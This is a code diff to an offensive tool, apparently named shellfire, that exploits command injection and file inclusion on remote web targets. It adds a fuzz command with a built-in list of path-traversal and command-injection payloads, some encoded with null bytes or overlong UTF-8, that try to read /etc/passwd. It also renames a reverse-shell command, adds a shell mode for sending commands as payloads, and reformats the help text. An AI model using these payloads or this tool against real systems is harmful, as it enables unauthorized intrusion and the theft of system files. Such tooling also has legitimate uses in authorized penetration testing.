@@ -9,7 +9,7 @@ import sys
 import threading
 import time
 import urllib.parse
-from shellfire.config import cfg, state
+from shellfire.config import cfg, state, Mode
 from shellfire.plugin_collection import plugins
 from shellfire.payloads import get_aspnet_payload, get_php_payload
 
@@ -30,6 +30,45 @@ def payload_php():
   return
 
 
+def payload_fuzzfile():
+  ## root:.:0:0:.*:.*:.+
+  if cfg.fuzzfile == 'default':
+    payload = [r"../../../../../../../../../etc/passwd",
+      r"../../../../../../../../etc/passwd",
+      r"../../../../../../../etc/passwd",
+      r"../../../../../../etc/passwd",
+      r"../../../../../etc/passwd",
+      r"../../../../etc/passwd",
+      r"../../../etc/passwd",
+      r"../../../../../../../../../../../../etc/passwd%00",
+      r"../../../../../../../../../../../../etc/passwd",
+      r"/../../../../../../../../../../etc/passwd^^",
+      r"/../../../../../../../../../../etc/passwd",
+      r"/./././././././././././etc/passwd",
+      r"\..\..\..\..\..\..\..\..\..\..c\passwd",
+      r"..\..\..\..\..\..\..\..\..\..c\passwd",
+      r"/..\../..\../..\../..\../..\../..\../etc/passwd",
+      r".\./.\./.\./.\./.\./.\./etc/passwd",
+      r"\..\..\..\..\..\..\..\..\..\..c\passwd%00",
+      r"..\..\..\..\..\..\..\..\..\..c\passwd%00",
+      r"%0a/bin/cat%20/etc/passwd",
+      r"%00/etc/passwd%00",
+      r"%00../../../../../../etc/passwd",
+      r"/../../../../../../../../../../../etc/passwd%00.jpg",
+      r"/../../../../../../../../../../../etc/passwd%00.html",
+      r"/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd",
+      r"/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
+      r"\&apos;/bin/cat%20/etc/passwd\&apos;"
+    ]
+  else:
+    payload = []
+    with open(cfg.fuzzfile, 'r') as file:
+      payloads = file.readlines()
+      for p in payloads:
+        payload.append(p)
+  return payload
+
+
 ############################################################
 ## Functions
 
@@ -44,7 +83,7 @@ def show_help(cmd=None):
   else:
     sys.stdout.write("Available commands:\n")
     for cmd_key in command_list:
-      sys.stdout.write("  .%s\n" % (cmd_key))
+      sys.stdout.write("  %s\n" % (cmd_key))
 
 
 def http_server(port):
@@ -220,10 +259,14 @@ def cmd_encode(cmd):
 
 
 def cmd_exit(cmd):
-  state.http_running = False
-  if os.path.isfile(cfg.history_file):
-    readline.write_history_file(cfg.history_file)
-  sys.exit(0)
+  ## exit one level from our current mode
+  if state.mode == Mode.config:
+    state.http_running = False
+    if os.path.isfile(cfg.history_file):
+      readline.write_history_file(cfg.history_file)
+    sys.exit(0)
+  elif state.mode == Mode.shell:
+    state.mode = Mode.config
 
 
 def cmd_files(cmd):
@@ -268,6 +311,24 @@ def cmd_find(cmd):
   return
 
 
+def cmd_fuzz(cmd):
+  ## set files to send to remote target
+  if len(cmd) == 1:
+    sys.stdout.write("[*] Fuzz file: %s\n" % (cfg.fuzzfile))
+    return
+  if cmd[1] == "start":
+    sys.stderr.write("[*] Starting fuzzer...\n")
+    state.exec_cmd = True
+    for payload in payload_fuzzfile():
+      state.userinput = payload
+      sys.stdout.write("[*] payload: %s\n" % (payload))
+      send_payload()
+    state.exec_cmd = False
+  else:
+    cfg.fuzzfile = cmd[1]
+  return
+
+
 def cmd_headers(cmd):
   """List or configure the HTTP request headers
     .headers
@@ -452,7 +513,7 @@ def cmd_referer(cmd):
   return
 
 
-def cmd_shell(cmd):
+def cmd_revshell(cmd):
   ## initiate a reverse shell via rce
   if len(cmd) != 3:
     sys.stderr.write("[!] Invalid parameters\n")
@@ -474,6 +535,12 @@ def cmd_shell(cmd):
   return
 
 
+def cmd_shell(cmd):
+  if state.mode == Mode.config:
+    state.mode = Mode.shell
+  return
+
+
 def cmd_url(cmd):
   ## set URL for remote target
   if len(cmd) > 1:
@@ -629,34 +696,34 @@ command_list = {
     "func": cmd_auth,
     "description": "",
     "help_text": [
-      ".auth - show current HTTP Auth credentials.\n",
-      ".auth <username>:<password> - set the HTTP Auth credentials.\n",
+      "auth                       - show current HTTP Auth credentials.\n",
+      "auth <username>:<password> - set the HTTP Auth credentials.\n",
     ],
   },
   "config": {
     "func": cmd_config,
     "description": "",
     "help_text": [
-      ".config save [name] - save a named config.\n",
-      ".config load [name] - load a named config.\n",
+      "config save [name] - save a named config.\n",
+      "config load [name] - load a named config.\n",
     ],
   },
   "cookies": {
     "func": cmd_cookies,
     "description": "",
     "help_text": [
-      ".cookies        - show current cookies to be sent with each request.\n",
-      ".cookies <string> - a string representing cookies you wish to send.\n",
-      "                  strings can be json or url encoded.\n",
-      "                  use '{}' to specify where command injection goes.\n",
+      "cookies          - show current cookies to be sent with each request.\n",
+      "cookies <string> - a string representing cookies you wish to send.\n",
+      "                   strings can be json or url encoded.\n",
+      "                   use '{}' to specify where command injection goes.\n",
     ],
   },
   "encode": {
     "func": cmd_encode,
     "description": "",
     "help_text": [
-      ".encode          - show current encoding used before sending commands.\n",
-      ".encode <string> - encode commands with plugin <string> before sending.\n",
+      "encode          - show current encoding used before sending commands.\n",
+      "encode <string> - encode commands with plugin <string> before sending.\n",
       "      * you may pass multiple plugins separated with spaces or pipes.\n",
     ],
   },
@@ -664,147 +731,165 @@ command_list = {
     "func": cmd_exit,
     "description": "",
     "help_text": [
-      ".exit - exits this program.\n"
+      "exit - exits this program.\n"
     ],
   },
   "files": {
     "func": cmd_files,
     "description": "",
     "help_text": [
-      ".files - show files to be sent to target.\n",
-      ".files \"\" - unset files.\n",
-      ".files <field> @<file> - send contents of file as <field>.\n",
-      ".files <field> <plugin> - send return value of plugin as <field>.\n",
-      "                          the plugin should return a tuple of values\n",
-      "                          for the filename and contents.\n",
+      "files                  - show files to be sent to target.\n",
+      "files \"\"               - unset files.\n",
+      "files <field> @<file>  - send contents of file as <field>.\n",
+      "files <field> <plugin> - send return value of plugin as <field>.\n",
+      "                         the plugin should return a tuple of values\n",
+      "                         for the filename and contents.\n",
     ],
   },
   "find": {
     "func": cmd_find,
     "description": "",
     "help_text": [
-      ".find setuid - search for setuid files.\n",
-      ".find setgid - search for setgid files.\n",
+      "find setuid - search for setuid files.\n",
+      "find setgid - search for setgid files.\n",
+    ],
+  },
+  "fuzz": {
+    "func": cmd_fuzz,
+    "description": "",
+    "help_text": [
+      "fuzz         - show source for fuzzing.\n",
+      "fuzz start   - start fuzzing.\n",
+      "fuzz @<file> - use file as source for fuzzing.\n",
+      "               type 'default' to use bult-in source.\n",
     ],
   },
   "headers": {
     "func": cmd_headers,
     "description": "",
     "help_text": [
-      ".headers default - sets the headers back to the shellfire defaults.\n",
-      ".headers <string>  - upserts the headers from your string into the header config.\n",
-      "                   strings can be json or url encoded.\n",
-      "                   use '{}' to specify where command injection goes.\n",
+      "headers default   - sets the headers back to the shellfire defaults.\n",
+      "headers <string>  - upserts the headers from your string into the header config.\n",
+      "                    strings can be json or url encoded.\n",
+      "                    use '{}' to specify where command injection goes.\n",
     ],
   },
   "help": {
     "func": cmd_help,
     "description": "",
     "help_text": [
-      ".help - prints all help topics.\n"
+      "help - prints all help topics.\n"
     ],
   },
   "history": {
     "func": cmd_history,
     "description": "",
     "help_text": [
-      ".history clear  - erase history.\n",
-      ".history nosave - do not write history file.\n",
-      ".history save   - write history file on exit.\n",
+      "history clear  - erase history.\n",
+      "history nosave - do not write history file.\n",
+      "history save   - write history file on exit.\n",
     ],
   },
   "http": {
     "func": cmd_http,
     "description": "",
     "help_text": [
-      ".http                - show status of HTTP server\n",
-      ".http payload [type] - set the payload to be used for RFI.\n",
-      "                       supported payload types:\n",
-      "                         aspnet\n",
-      "                         php\n",
-      ".http start [port]   - start HTTP server.\n",
-      ".http stop           - stop HTTP server.\n",
+      "http                - show status of HTTP server\n",
+      "http payload [type] - set the payload to be used for RFI.\n",
+      "                      supported payload types:\n",
+      "                        aspnet\n",
+      "                        php\n",
+      "http start [port]   - start HTTP server.\n",
+      "http stop           - stop HTTP server.\n",
     ],
   },
   "marker": {
     "func": cmd_marker,
     "description": "",
     "help_text": [
-      ".marker              - show the current payload output marker.\n",
-      ".marker set <string> - set the payload output marker to string.\n",
-      ".marker out <number> - the output indices to display after splitting on",
-      "                       our marker.\n",
+      "marker              - show the current payload output marker.\n",
+      "marker set <string> - set the payload output marker to string.\n",
+      "marker out <number> - the output indices to display after splitting on\n",
+      "                      our marker.\n",
     ],
   },
   "method": {
     "func": cmd_method,
     "description": "",
     "help_text": [
-      ".method      - show current HTTP method.\n",
-      ".method get  - set HTTP method to GET.\n",
-      ".method post - set HTTP method to POST.\n",
-      ".method form - set HTTP method to POST using multipart form data.\n",
+      "method      - show current HTTP method.\n",
+      "method get  - set HTTP method to GET.\n",
+      "method post - set HTTP method to POST.\n",
+      "method form - set HTTP method to POST using multipart form data.\n",
     ],
   },
   "phpinfo": {
     "func": cmd_phpinfo,
     "description": "",
     "help_text": [
-      ".phpinfo - executes the '_show_phpinfo' command via the PHP payload.\n"
+      "phpinfo - executes the '_show_phpinfo' command via the PHP payload.\n"
     ],
   },
   "plugins": {
     "func": cmd_plugins,
     "description": "",
     "help_text": [
-      ".plugins - list all available plugins.\n"
+      "plugins - list all available plugins.\n"
     ],
   },
   "post": {
     "func": cmd_post,
     "description": "",
     "help_text": [
-      ".post <string> - a string representing post data you wish to send.\n",
-      "               strings can be json or url encoded.\n",
-      "               use '{}' to specify where command injection goes.\n",
+      "post <string> - a string representing post data you wish to send.\n",
+      "                strings can be json or url encoded.\n",
+      "                use '{}' to specify where command injection goes.\n",
     ]
   },
   "referer": {
     "func": cmd_referer,
     "description": "",
     "help_text": [
-      ".referer          - show the HTTP referer string.\n",
-      ".referer <string> - set the value for HTTP referer.\n",
+      "referer          - show the HTTP referer string.\n",
+      "referer <string> - set the value for HTTP referer.\n",
     ],
   },
+  "revshell": {
+    "func": cmd_revshell,
+    "description": "",
+    "help_text": [
+      "shell <ip_address> <port> - initiate reverse shell to target.\n",
+    ]
+  },
   "shell": {
     "func": cmd_shell,
     "description": "",
     "help_text": [
-      ".shell <ip_address> <port> - initiate reverse shell to target.\n",
+      "shell - enter exploitation shell. commands entered here are processed and sent as\n",
+      "        payloads to your target.\n"
     ]
   },
   "url": {
     "func": cmd_url,
     "description": "",
     "help_text": [
-      ".url <string> - set the target URL to string.\n",
-      "                use '{}' to specify where command injection goes.\n",
+      "url <string> - set the target URL to string.\n",
+      "               use '{}' to specify where command injection goes.\n",
     ],
   },
   "useragent": {
     "func": cmd_useragent,
     "description": "",
     "help_text": [
-      ".useragent          - show the User-Agent string.\n",
-      ".useragent <string> - set the value for User-Agent.\n",
+      "useragent          - show the User-Agent string.\n",
+      "useragent <string> - set the value for User-Agent.\n",
     ],
   },
   "quit": {
     "func": cmd_exit,
     "description": "Alias of \".exit\"",
     "help_text": [
-      ".quit - exits this program.\n"
+      "quit - exits this program.\n"
     ],
   },
 }
